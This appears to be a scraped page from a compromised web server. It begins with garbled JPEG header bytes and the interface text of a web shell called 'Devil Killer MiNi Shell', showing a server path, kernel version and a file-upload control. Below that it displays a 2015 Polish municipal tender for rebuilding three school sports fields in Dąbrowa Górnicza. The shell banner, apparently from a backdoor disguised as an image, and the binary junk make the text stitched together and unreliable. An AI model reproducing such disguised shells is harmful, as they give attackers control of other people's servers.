JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150427/59389-N-2015.html

<p class="kh_header"><b>Dąbrowa Górnicza: ZADANIE A:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania   zdrowego stylu życia, boisko wielofunkcyjne  na terenie  V LO  przy  ul. Czapińskiego   w Dąbrowie Górniczej.  
 
ZADANIE B:
 Modernizacja obiektu sportowego dla dzieci  i młodzieży, w tym   z rodzin  zagrożonych  patologią w placówce Opiekuńczo - Wychowawczej Przystań, boisko wielofunkcyjne przy   ul. Jasnej w Dąbrowie Górniczej.
 
ZADANIE C:
 Modernizacja boiska  sportowego przy Gimnazjum nr 1, boisko wielofunkcyjne przy  ul. Królowej Jadwigi  w Dąbrowie Górniczej.</b><br>
<b>Numer ogłoszenia: 59389 - 2015; data zamieszczenia: 27.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZADANIE A:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania   zdrowego stylu życia, boisko wielofunkcyjne  na terenie  V LO  przy  ul. Czapińskiego   w Dąbrowie Górniczej.  
 
ZADANIE B:
 Modernizacja obiektu sportowego dla dzieci  i młodzieży, w tym   z rodzin  zagrożonych  patologią w placówce Opiekuńczo - Wychowawczej Przystań, boisko wielofunkcyjne przy   ul. Jasnej w Dąbrowie Górniczej.
 
ZADANIE C:
 Modernizacja boiska  sportowego przy Gimnazjum nr 1, boisko wielofunkcyjne przy  ul. Królowej Jadwigi  w Dąbrowie Górniczej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu nieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2013r., poz. 907 z późn. zm.)  o wartości zamówienia poniżej 5.186.000,00 EUR 
Opis przedmiotu zamówienia:
I. ZADANIE A:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania   zdrowego stylu życia, boisko wielofunkcyjne  na terenie   V LO  przy  ul. Czapińskiego   w Dąbrowie Górniczej.
1.	Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych, tj:
Przebudowa istniejącego boiska z nawierzchnią asfaltobetonową ograniczoną obrzeżami betonowymi 8 x 30 cm.  Przebudowa boiska będzie polegała na wykonaniu nowego boiska wielofunkcyjnego o wymiarach 43,00 x 23,00 m i  nawierzchni poliuretanowej na istniejącym boisku asfaltobetonowym po uprzednim przygotowaniu istniejącej nawierzchni asfaltobetonowej, wykonaniu chodnika wzdłuż boiska oraz wykonaniu piłkochwytów o wysokości h = 6,0 m  i wysokości h = 4,0 m  wraz z wykonaniem dokumentacji projektowej. 
2.	Zagospodarowanie terenu istniejącego boiska obejmuje:
2.1.boisko wielofunkcyjne o powierzchni 989,00 m2 do gry w piłkę ręczną (mini nożnej), piłkę koszykową i piłkę siatkową o nawierzchni syntetycznej poliuretanowej, 
2.2. piłkochwyty o wysokości h= 4,0 m  i wysokości h= 6,0 m  za bramkami,
2.3. chodnik  z koski betonowej  gr. 6 cm  o pow. 65,00 m2,
2.4. mała architektura: 6 ławek  parkowych i 2 kosze na śmieci,
3.	Parametry techniczne przebudowywanego obiektu - należy zaprojektować i wykonać następujące elementy obiektu:
- boisko wielofunkcyjne: do piłki ręcznej (mini nożnej), piłki koszykowej i piłki siatkowej o wymiarach 43,00 x 23,00 m o nawierzchni syntetycznej poliuretanowej w kolorze ceglastym, zielonym i żółtym, mieszczące w swym obrysie: 
- boisko do piłki ręcznej (mini nożnej) o polu gry 40,00 x 20,00 m, boisko wydzielone liniami  szer. 5 cm, boisko wyposażone w dwie bramki  3 x 2 m,
- dwa boiska do piłki koszykowej o wymiarach 21,50 x 14,00, boiska wydzielone liniami szer. 5 cm, boiska wyposażone w cztery stojaki do koszykówki,
- dwa boiska do siatkówki o wymiarach 9,00 x 18,00 m, boiska wydzielone liniami szer. 5 cm, boiska wyposażone w dwa komplety słupków do siatkówki.
- Nawierzchnia boisk syntetyczna poliuretanowa w kolorze ceglastym, zielonym i żółtym, linie segregacyjne poszczególnych boisk szer. 5 cm malowane farbą systemową poliuretanową w następujących kolorach: boisko do piłki ręcznej (mini piłki nożnej) w kolorze białym, boiska  do koszykówki w kolorze niebieskim, boiska do siatkówki w kolorze żółtym. Boisko wyposażone w bramki do piłki ręcznej o konstrukcji stalowej i wymiarach 3,00 x 2,00 m, stojaki do koszykówki o konstrukcji stalowej, wysięgu 1,60 m i słupki do siatkówki o konstrukcji aluminiowej  z mechanizmem naciągowym i możliwością regulacji wysokości siatki.
- piłkochwyty: 
na szerokości boiska i wzdłuż jednego dłuższego boku, należy przewidzieć piłkochwyty o długości 2 x 23,00 m i wysokości 6,00 oraz długości 40,00 mb i wysokości h = 4,00 m. Piłkochwyty systemowe z siatki polipropylenowej na słupach stalowych. 
- chodnik:
chodnik z kostki betonowej gr. 6 cm na podsypce cementowo piaskowej o szer. 1,50 m, wzdłuż dłuższego boku boiska wielofunkcyjnego,
- ławki parkowe, kosze na śmieci: 
w chodniku z koski betonowej przewidzieć 6 ławek parkowych bez oparcia o konstrukcji rurowej z  siedziskami drewnianymi oraz 2 kosze na śmieci umieszczone między ławkami. Ławki i kosze montowane na stałe w podłożu.
4.	Rozwiązania konstrukcyjno-materiałowe podbudów i nawierzchni urządzeń sportowych - boisko wielofunkcyjne: wymagane przygotowanie nawierzchni asfaltobetonowej
 4.1. Stan istniejącej nawierzchni asfaltobetonowej boisk daje możliwość wykorzystania jej jako podbudowy pod nową nawierzchnię syntetyczną.
4.2. Istniejącą podbudowę asfaltobetonową należy przygotować wg. następującej  technologii:
- zniszczoną podbudowę asfaltobetonową należy rozebrać, usunąć luźne fragmenty asfaltobetonu z powierzchni  podbudowy i rys spękań,
- istniejące ubytki asfaltobetonu uzupełnić betonem B-20 na pełną grubość asfaltobetonu,
- na całej powierzchni wylać płytę betonową z betonu B-25 o gr. min 10 cm, z odpowiednim spadkiem w kierunku północno-zachodnim (jak spadek istniejącego boiska asfaltobetonowego), płytę ograniczyć nowymi obrzeżami betonowymi 8x30 cm, po uprzednim demontażu starych,
-podbudowa betonowa zatarta na ostro, zdylatowana (zgodnie ze sztuką budowlaną), wysezonowana - wilgotność rzędu 3-5 %.
4.3.	Na tak przygotowanej podbudowie wykonać nową nawierzchnię syntetyczną poliuretanową, dwuwarstwową typu natryskowego, składającą się z maty elastomerowej gr.~10 mm oraz poliuretanowego natrysku gr. ~3 mm, w kolorze ceglastym, zielonym i żółtym.
5.	Obiekt należy wyposażyć w następujący sprzęt sportowy: 
- dwie bramki do piłki ręcznej o wymiarach 3,00x2,00 m, konstrukcji stalowej z profilu 80 x 80 mm, malowane proszkowo, montowane w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki polietylenowe  PE-4 gł. 0,8/1,0 m (produkt typowy). Bramki montowane zgodnie z zaleceniami producenta.
- cztery stojaki do koszykówki, stalowe cynkowane, montowane w tulei, o wysięgu 1,60 m, wyposażone w tablice stalowe ażurowe, cynkowane o wymiarach 1,05x1,80 m, z obejmą wzmocnioną cynkowaną i siatką łańcuszkową. Stojaki wyposażone w osłony słupów. Stojaki montowane zgodnie z zaleceniami producenta.
- dwa komplety słupków do siatkówki, aluminiowych o profilu owalnym, z mechanizmem naciągu i regulacji wysokości siatki, montowanych w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki turniejowe z antenkami wzmocnione taśmą z czterech stron (9.0x1.0 m) w kolorze białym (produkt typowy). Słupki montowane zgodnie z zaleceniami producenta.
II. ZADANIE B:
Modernizacja obiektu sportowego dla dzieci i młodzieży,  w tym z rodzin  zagrożonych  patologią w placówce Opiekuńczo-Wychowawczej Przystań, boisko wielofunkcyjne przy ul. Jasnej w Dąbrowie Górniczej.
1.	Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych, tj:
Przebudowa istniejącego boiska z nawierzchnią asfaltobetonową ograniczoną obrzeżami betonowymi 8 x 30 cm.  Przebudowa boiska będzie polegała na wykonaniu nowego boiska wielofunkcyjnego  o wymiarach 28,00 x 16,00 m o  nawierzchni poliuretanowej, na istniejącym boisku asfaltobetonowym po uprzednim przygotowaniu istniejącej nawierzchni asfaltobetonowej, wykonaniu chodnika wzdłuż boiska oraz wykonaniu piłkochwytów o wysokości h = 6,0 m i wysokości h = 4,0 m wraz z wykonaniem dokumentacji projektowej. 
2.	Zagospodarowanie terenu istniejącego boiska obejmuje:
2.1.boisko wielofunkcyjne o pow.  448,00  m2  do gry w piłkę ręczną  (mini nożną)  do piłki koszykowej  i piłki  siatkowej  o nawierzchni syntetycznej poliuretanowej, 
2.2. piłkochwyty o wysokości  h = 4,0 m i h= 6,0 m za bramkami,
2.3. chodnik z  koski  betonowej  gr.  6 cm  o pow. 56,00 m2,
2.4. mała architektura: 6  ławek parkowych,  2 kosze na śmieci.
3.	Parametry techniczne przebudowywanego obiektu - należy zaprojektować i wykonać następujące elementy obiektu:
- boisko wielofunkcyjne: do piłki ręcznej (mini nożnej), piłki koszykowej i piłki siatkowej o wymiarach 28,00x16,00 m o nawierzchni syntetycznej poliuretanowej w kolorze ceglastym, zielonym i żółtym, mieszczące w swym obrysie:
- boisko do piłki ręcznej (mini nożnej) o polu gry 26,00 x14,00 m, boisko wydzielone liniami  szer.  5 cm,
- boisko do piłki koszykowej o wymiarach 26,00x 14,00 m ,boisko wydzielone liniami szer. 5 cm,
- boisko do siatkówki o wymiarach 9,00 x 18,00 m, boisko wydzielone liniami  szer. 5 cm. 
- Nawierzchnia boisk syntetyczna poliuretanowa w kolorze ceglastym, zielonym i żółtym, linie segregacyjne poszczególnych boisk szer. 5 cm malowane farbą systemową poliuretanową  w następujących kolorach: boisko do piłki ręcznej (mini piłki nożnej) w kolorze białym, boisko do koszykówki w kolorze żółtym, boisko do siatkówki w kolorze niebieskim. Boiska wyposażone w bramki do piłki ręcznej o wymiarach 3,00 x 2,00 m, stojaki do koszykówki o wysięgu 2,20 m i słupki do siatkówki z mechanizmem naciągowym i możliwością regulacji wysokości siatki.
-  piłkochwyty :
 na szerokości boiska i wzdłuż jednego dłuższego boku, należy przewidzieć piłkochwyty o długości 2 x 16,50 m i wysokości h = 6,00 m, oraz długości 29,0 mb i wysokości h = 4,00 m. Piłkochwyty systemowe z siatki polipropylenowej na słupach stalowych. 
- chodnik:
 chodnik z kostki betonowej gr. 6 cm na podsypce cementowo piaskowej o szer. 2,00 m, wzdłuż dłuższego boku boiska wielofunkcyjnego oraz chodnik łączący boisko z chodnikiem istniejącym, 
-  ławki parkowe, kosze na śmieci: 
w chodniku z koski betonowej przewidzieć 6 ławek parkowych bez oparcia o konstrukcji rurowej  z  siedziskami drewnianymi oraz 2 kosze na śmieci umieszczone między ławkami. Ławki i kosze montowane na stałe w podłożu.
4.	Rozwiązania konstrukcyjno-materiałowe podbudów i nawierzchni  urządzeń sportowych - boisko wielofunkcyjne:  wymagane przygotowanie nawierzchni asfaltobetonowej
4.1.	Stan istniejącej nawierzchni asfaltobetonowej boisk daje możliwość wykorzystania jej jako podbudowy pod nową nawierzchnię syntetyczną.
4.2.	Istniejącą podbudowę asfaltobetonową należy przygotować wg. następującej  technologii:
- zniszczoną podbudowę asfaltobetonową należy rozebrać, usunąć luźne fragmentów asfaltobeton z powierzchni  podbudowy i rys spękań,
- istniejące ubytki asfaltobetonu uzupełnić betonem B-20 na pełną grubość asfaltobetonu,
- na całej powierzchni wylać płytę betonową z betonu B-25 o gr. min 10 cm, z odpowiednimi spadkami rzędu 0,5 % w kierunku poprzecznym, płytę ograniczyć nowymi obrzeżami betonowymi 8 x 30 cm, po uprzednim demontażu starych
- podbudowa betonowa zatarta na ostro, zdylatowana (zgodnie ze sztuką budowlaną), wysezonowana - wilgotność rzędu 3-5 %.
4.3.	Na tak przygotowanej podbudowie wykonać nową nawierzchnię syntetyczną poliuretanową, dwuwarstwową typu natryskowego, składającą się z maty elastomerowej gr.~10 mm oraz poliuretanowego natrysku gr. ~3 mm, w kolorze ceglastym, zielonym i żółtym.

5.	Obiekt należy wyposażyć w następujący sprzęt sportowy: 
- dwie bramki do piłki ręcznej o wymiarach 3,00 x 2,00 m, konstrukcji aluminiowej z profilu 80 x 80 mm, malowane proszkowo, montowane w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki polietylenowe PE-4 gł. 0,8/1,0 m (produkt typowy). Bramki montowane zgodnie z zaleceniami producenta.
 
- dwa stojaki do koszykówki, stalowe cynkowane, montowane w tulei, o wysięgu 2,20 m, wyposażone w tablice stalowe ażurowe, cynkowane o wymiarach 1,05 x 1,80 m z obejmą wzmocnioną cynkowaną i siatką łańcuszkową. Stojaki wyposażone w osłony słupów. Stojaki montowane zgodnie z zaleceniami producenta.
 
- jeden komplet słupków do siatkówki, aluminiowych o profilu owalnym, z mechanizmem naciągu i regulacji wysokości siatki, montowanych w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki turniejowe z antenkami wzmocnione taśmą z czterech stron (9.0x1.0 m) w kolorze białym (produkt typowy). Słupki montowane zgodnie z zaleceniami producenta.

III. ZADANIE C:
Modernizacja boiska sportowego przy Gimnazjum nr 1, boisko wielofunkcyjne przy ul. Królowej Jadwigi  w Dąbrowie Górniczej.

1.	Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowej na podstawie Programu  Funkcjonalno - Użytkowego i wykonanie robót budowlanych, tj:
 Przebudowa istniejącego boiska z nawierzchnią asfaltobetonową ograniczoną obrzeżami betonowymi 8 x 30 cm.  Przebudowa boiska będzie polegała na wykonaniu nowego boiska wielofunkcyjnego  o wymiarach 20,00 x 38,00 m o  nawierzchni poliuretanowej, na istniejącym boisku asfaltobetonowym po uprzednim przygotowaniu istniejącej nawierzchni asfaltobetonowej, wykonaniu chodnika wzdłuż boiska oraz wykonaniu piłkochwytów o wysokości h = 6,0 m i wysokości h = 4,0 m  wraz z wykonaniem dokumentacji projektowej. 

2.	Zagospodarowanie terenu istniejącego boiska obejmuje 
2.1.boisko wielofunkcyjne o pow.  760,00 m2  do gry w piłkę ręczną, do piłki koszykowej   i piłki  siatkowej  o nawierzchni syntetycznej poliuretanowej, 
2.2. piłkochwyty  o wysokości  h = 4,0 m i h= 6,0 m za bramkami,
2.3. chodnik z  koski  betonowej  gr.  6 cm   o pow. 76,00 m2,
2.4. mała architektura: 8  ławek parkowych,  4 kosze na śmieci,
2.5. istniejące odwodnienie liniowe boiska, które należy sprawdzić i udrożnić.

3.	Parametry techniczne przebudowywanego obiektu - należy zaprojektować i wykonać następujące elementy obiektu:
- boisko wielofunkcyjne:   o wymiarach  20,00 x 38,00 m,  o nawierzchni syntetycznej poliuretanowej w kolorze ceglastym, zielonym i żółtym, mieszczące w swym obrysie:
- boisko do piłki ręcznej w wym. 19,00 mx 36,00 m, boisko wydzielone liniami  szer. 5 cm w kolorze białym,
- dwa boiska do piłki koszykowej o wymiarach 19,00 x 14,00 m, boiska  wydzielone liniami  szer.  5 cm w kolorze niebieskim,
- boisko do piłki siatkówkowej o wymiarach 9,00 x 18,00 m, boisko  wydzielone liniami  szer. 5 cm w kolorze żółtym
 
- piłkochwyty:  
Piłkochwyty  zabramkowe boiska h =6,00 m, długości 2 x 20,00 m oraz piłkochwyty  po długości boiska h = 4,00 m i długości L1= 34,00 m i L2 = 32,50 m.  Piłkochwyty  systemowe z siatki polipropylenowej na słupach stalowych. 

- chodnik:
chodnik z kostki betonowej gr. 6 cm na podsypce cementowo piaskowej o szer. 2,00 m, wzdłuż dłuższego boku boiska wielofunkcyjnego,

- ławki parkowe, kosze na śmieci: 
przy boisku należy przewidzieć 8 ławek parkowych bez oparcia o konstrukcji rurowej z  siedziskami drewnianymi oraz 4 kosze na śmieci umieszczone między ławkami. Ławki i kosze montowane na stałe w podłożu.

- odwodnienie boiska: 
istniejące boisko asfaltobetonowe posiada odwodnienie liniowe wzdłuż dłuższych boków które należy przeczyścić, sprawdzić i udrożnić.
 
4.	Rozwiązania konstrukcyjno-materiałowe podbudów i nawierzchni  urządzeń sportowych:
wymagane przygotowanie podbudowy asfaltobetonowej
4.1.	Stan istniejącej nawierzchni asfaltobetonowej boiska daje możliwość wykorzystania jej jako podbudowy pod nową nawierzchnię syntetyczną.
4.2.	Istniejącą podbudowę asfaltobetonową należy przygotować wg. następującej  technologii :
- usunąć luźne fragmenty asfaltobetonu z powierzchni  podbudowy i rys spękań,
- istniejące nieliczne ubytki asfaltobetonu uzupełnić betonem B-20 na pełną grubość asfaltobetonu,
- w miejscach zaniżeń asfaltobetonu, w których obecnie po opadach deszczu tworzą się zastoiny wodne, wyciąć otwory o wymiarach 30 x 30 cm, wypełnić  je tłuczniem frakcji 4-31,5 mm  i odpowiednio zagęścić do stopnia 0,98,
- zagruntować przygotowaną podbudowę preparatem szczepnym poliuretanowym,
- wyrównać miejsca zaniżeń i wyprofilować właściwe spadki warstwą z kompozytu poliuretanowego stanowiącego mieszankę kruszywa mineralnego (żwirku suszonego), granulatu gumowego i kleju poliuretanowego.
4.3.	Na tak przygotowanej podbudowie wykonać nową nawierzchnię syntetyczną   poliuretanową, dwuwarstwową typu natryskowego, składającą się z maty elastomerowej gr.~10 mm oraz poliuretanowego natrysku gr. ~3 mm, w kolorze ceglastym, zielonym i żółtym.  

5.	Obiekt należy wyposażyć w następujący sprzęt sportowy:
- dwie bramki do piłki ręcznej o wymiarach 3,00 x 2,00 m, konstrukcji stalowej z profilu  80 x 80 mm, malowane proszkowo, montowane w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej               z nawierzchnią boiska, wyposażone w siatki polietylenowe PE-4 gł. 0,8/1,0 m (produkt typowy). Bramki montowane zgodnie z zaleceniami producenta.

- cztery stojaki do koszykówki, stalowe cynkowane, montowane w tulei, o wysięgu 2,20 m, wyposażone w tablice stalowe ażurowe, cynkowane o wymiarach 1,05 x 1,80 m z obejmą wzmocnioną cynkowaną i siatką łańcuszkową. Stojaki montowane zgodnie z zaleceniami producenta.

- 1 komplet słupków do siatkówki, uniwersalnych (siatkówka badminton), aluminiowych o profilu owalnym, z mechanizmem naciągu i regulacji wysokości siatki, montowanych w tulejach z możliwością demontażu                         i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki turniejowe z antenkami wzmocnione taśmą z czterech stron (9.0x1.0 m) w kolorze białym (produkt typowy). Słupki montowane zgodnie z zaleceniami producenta.

- siatka do badmintona (6,10 x 0,76 m) w kolorze białym (produkt typowy). Słupki montowane zgodnie z zaleceniami producenta.

IV. Wymagania ogólne dotyczące zadań:  A, B, C: 
1.	Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych: 
1.1. Część projektowa - zamówienia polega na opracowaniu przez Wykonawcę kompletnej dokumentacji  projektowej dla każdego zadania oddzielnie obejmująca swym zakresem: 
a) projekt budowlany, specyfikacją  techniczną wykonania i odbioru robót  oraz  plan  bioz, 
b) projekty wykonawcze   
c)  przedmiary robót.
1.2. Część  wykonawcza (roboty budowlane) - Część wykonawcza zamówienia polega na wykonaniu  przez Wykonawcę robót budowlanych w oparciu o sporządzoną dokumentacje obejmującej zakres opisany w pkt. 1.1 powyżej.

2.	Parametry techniczne syntetycznej nawierzchni poliuretanowej: wymagane rozwiązania konstrukcyjno-materiałowe nawierzchni.
Nową syntetyczną nawierzchnię sportową boiska należy zaprojektować jako nawierzchnię poliuretanowo-gumową o grubości warstwy 13 mm - wersja podstawowa, wymagająca podbudowy asfaltobetonowej, betonowej lub podbudowy z mieszaniny kruszywa kwarcowego i granulatu gumowego połączonego lepiszczem poliuretanowym.  Nawierzchnia ta jest przepuszczalna dla wody, o zwartej strukturze,  służy  do pokrywania nawierzchni bieżni lekkoatletycznych, sektorów i rozbiegów konkurencji technicznych zawodów dla boisk wielofunkcyjnych, szkolnych, placów rekreacji ruchowej.
Nawierzchnia będzie składać się z dwóch warstw elastycznej (nośnej) i użytkowej. Warstwa nośna to mieszanina granulatu gumowego i lepiszcza poliuretanowego. Układana jest mechanicznie, bezspoinowo, przy pomocy rozkładarki mas poliuretanowych (np. Planomatic lub równoważny). Tak wykonaną warstwę należy pokryć warstwą użytkową, którą  stanowi system poliuretanowy zmieszany z granulatem EPDM. Czynność tą wykonuje się  poprzez natrysk mechaniczny (przy użyciu specjalnej natryskarki np. firmy SMG lub równoważny). Grubość warstwy użytkowej 2-3 mm. Po całkowitym związaniu mieszaniny są malowane linie farbami poliuretanowymi metodą natrysku.
 
3.	Nawierzchnia poliuretanowa powinna mieć parametry nie gorsze niż opisane poniżej:
2.1.Określenie parametru, jednostka, wartość wymagania:
- Wytrzymałość na rozciąganie, (N/ mm2) - min. 1 
- Odporność na działanie zmiennych cykli hydrotechnicznych oceniona:
- przyrostem masy, (%) - 0,3 -0,4
- zmianą wyglądu zewnętrznego - bez zmian
- Odporność nawierzchni na działanie butów z kolcami:
- Spadek wytrzymałości na rozciąganie (%) - 5,0 - 8,0 
- Spadek wydłużenia przy zerwaniu (%) -5,0 - 7,0 
- Zmiana wymiarów po działaniu temperatury +60oC, (%) - 0,01-0,02
- Wytrzymałość na rozdzieranie, (N) - 140 - 150 
- Ścieralność - ubytek grubości (mm) -0,08 - 0,09
- Współczynnik tarcia kinetycznego powierzchni:
- w stanie suchym -  0,50 - 0,60
- w stanie mokrym -  0,30 - 0,35
- Przyczepność do podkładu, (MPa)
 -betonowego - 0,6 - 0,7
- asfaltobetonowego - 0,5 - 0,6
- z mieszaniny kruszywa kwarcowego, granulatu gumowego i spoiwa PU - 0,5 -0,6 
- mrozoodporność oceniona : przyrostem masy (%) - 0,4 - 0,5
- zmianą wyglądu zewnętrznego  - bez zmian 
- odporność na ścieranie wg metody Tabera (G) -1,1 - 1,2 
- nasiąkliwość (%) - 10 - 12 
- wydłużenie względne przy zerwaniu (%) -  48 - 50
- tłumienie energii 23oC (%) - 36-38.

2.2.Zawartość metali ciężkich (mg/l):
- ołów (Pb)-< 0,005
- kadm (Cd)-< 0,0005
- chrom (Cr)-< 0,005
- rtęć (Hg)-< 0,0002
- cynk (Zn)-0,8 - 0,9
- cyna (Sn)-< 0,005
Nawierzchnia powinna być przyjazna dla otoczenia i ludzi korzystających z niej, a zawartość związków chemicznych  powinna być nie większa  niż opisana  powyżej.

